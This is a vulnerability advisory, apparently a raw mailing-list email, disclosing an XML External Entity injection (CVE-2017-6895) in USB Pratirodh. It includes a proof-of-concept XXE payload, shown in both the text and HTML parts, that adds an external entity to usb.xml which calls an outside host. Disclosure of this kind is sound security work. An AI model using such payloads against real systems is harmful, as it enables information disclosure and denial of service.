USB Pratirodh XXE Injection

Related Vulnerabilities: CVE-2017-6895  
Publish Date: 15 Mar 2017
Author: Sachin Wagh
                							

                --001a113ff018269a92054ac84a6a
Content-Type: text/plain; charset=UTF-8

Vulnerability Title: USB Pratirodh XML External Entity Injection
Vulnerability
Affected Product: USB Pratirodh
Product Homepage: https://cdac.in/index.aspx?id=cs_eps_usb_pra
CVE-ID : CVE-2017-6895
Severity: Medium
Class: XXE  [CWE-611]
Impact: XML External Entity, Information Disclosure, Denial Of Service,
Author: Sachin Wagh (@tiger_tigerboy)

*Description:*

USB Pratirodh is prone to an XML External Entity injection vulnerability.
XXE attack is an attack on an application that parses XML input from
untrusted sources using incorrectly configured XML parser. This attack may
lead to the disclosure of confidential data, denial of service, server side
request forgery, port scanning from the perspective of the machine where
the parser is located, and other system impacts.
Proof of Concept:

Added below code after xml tag in to the usb.xml file.

*<!DOCTYPE foo [ *
* <!ELEMENT foo ANY >*
* <!ENTITY xxe SYSTEM "http://tigerboy.com/XXE <http://tigerboy.com/XXE>"
>]><foo>&xxe;</foo>*

*Reference:*

https://secur1tyadvisory.wordpress.com/2017/03/15/usb-pratirodh-xml-external-entity-injection-vulnerability/

*Credit:*

*Sachin Wagh (@tiger_tigerboy)*

--001a113ff018269a92054ac84a6a
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

<div dir=3D"ltr"><div><div class=3D"gmail_signature"><div dir=3D"ltr"><div =
dir=3D"ltr"><div dir=3D"ltr"><div style=3D"color:rgb(34,34,34);font-family:=
calibri;font-size:medium;font-style:normal;font-variant-ligatures:normal;fo=
nt-variant-caps:normal;font-weight:normal;letter-spacing:normal;line-height=
:normal;text-align:start;text-indent:0px;text-transform:none;white-space:no=
rmal;word-spacing:0px;background-color:rgb(255,255,255)"></div><div dir=3D"=
ltr">Vulnerability Title: USB Pratirodh XML External Entity Injection Vulne=
rability</div><div dir=3D"ltr">Affected Product: USB Pratirodh</div><div di=
r=3D"ltr">Product Homepage: <a href=3D"https://cdac.in/index.aspx?id=3Dcs_e=
ps_usb_pra">https://cdac.in/index.aspx?id=3Dcs_eps_usb_pra</a></div><div di=
r=3D"ltr">CVE-ID : CVE-2017-6895</div><div dir=3D"ltr">Severity: Medium</di=
v><div dir=3D"ltr">Class: XXE =C2=A0[CWE-611]</div><div dir=3D"ltr">Impact:=
 XML External Entity, Information Disclosure, Denial Of Service,</div><div =
dir=3D"ltr">Author: Sachin Wagh (@tiger_tigerboy)</div><div dir=3D"ltr"><br=
></div><div dir=3D"ltr"><b>Description:</b></div><div dir=3D"ltr"><br></div=
><div dir=3D"ltr">USB Pratirodh is prone to an XML External Entity injectio=
n vulnerability.</div><div dir=3D"ltr">XXE attack is an attack on an applic=
ation that parses XML input from untrusted sources using incorrectly config=
ured XML parser. This attack may lead to the disclosure of confidential dat=
a, denial of service, server side request forgery, port scanning from the p=
erspective of the machine where the parser is located, and other system imp=
acts.</div><div dir=3D"ltr">Proof of Concept:</div><div dir=3D"ltr"><br></d=
iv><div dir=3D"ltr">Added below code after xml tag in to the usb.xml file.<=
/div><div dir=3D"ltr"><br></div><div dir=3D"ltr"><b><!DOCTYPE foo [=C2=
=A0</b></div><div dir=3D"ltr"><b>=C2=A0<!ELEMENT foo ANY ></b></div><=
div dir=3D"ltr"><b>=C2=A0<!ENTITY xxe SYSTEM "<a href=3D"http://tig=
erboy.com/XXE">http://tigerboy.com/XXE</a>" >]><foo>&x=
xe;</foo></b></div><div dir=3D"ltr">=C2=A0</div><div dir=3D"ltr"><b>R=
eference:</b></div><div dir=3D"ltr"><br></div><div dir=3D"ltr"><a href=3D"h=
ttps://secur1tyadvisory.wordpress.com/2017/03/15/usb-pratirodh-xml-external=
-entity-injection-vulnerability/">https://secur1tyadvisory.wordpress.com/20=
17/03/15/usb-pratirodh-xml-external-entity-injection-vulnerability/</a><br>=
</div><div dir=3D"ltr"><br></div><div dir=3D"ltr"><b>Credit:</b></div><div =
dir=3D"ltr"><b><br></b></div><div dir=3D"ltr"><b>Sachin Wagh (@tiger_tigerb=
oy)</b></div><div><br></div></div></div></div></div></div>
</div>

--001a113ff018269a92054ac84a6a--
<p>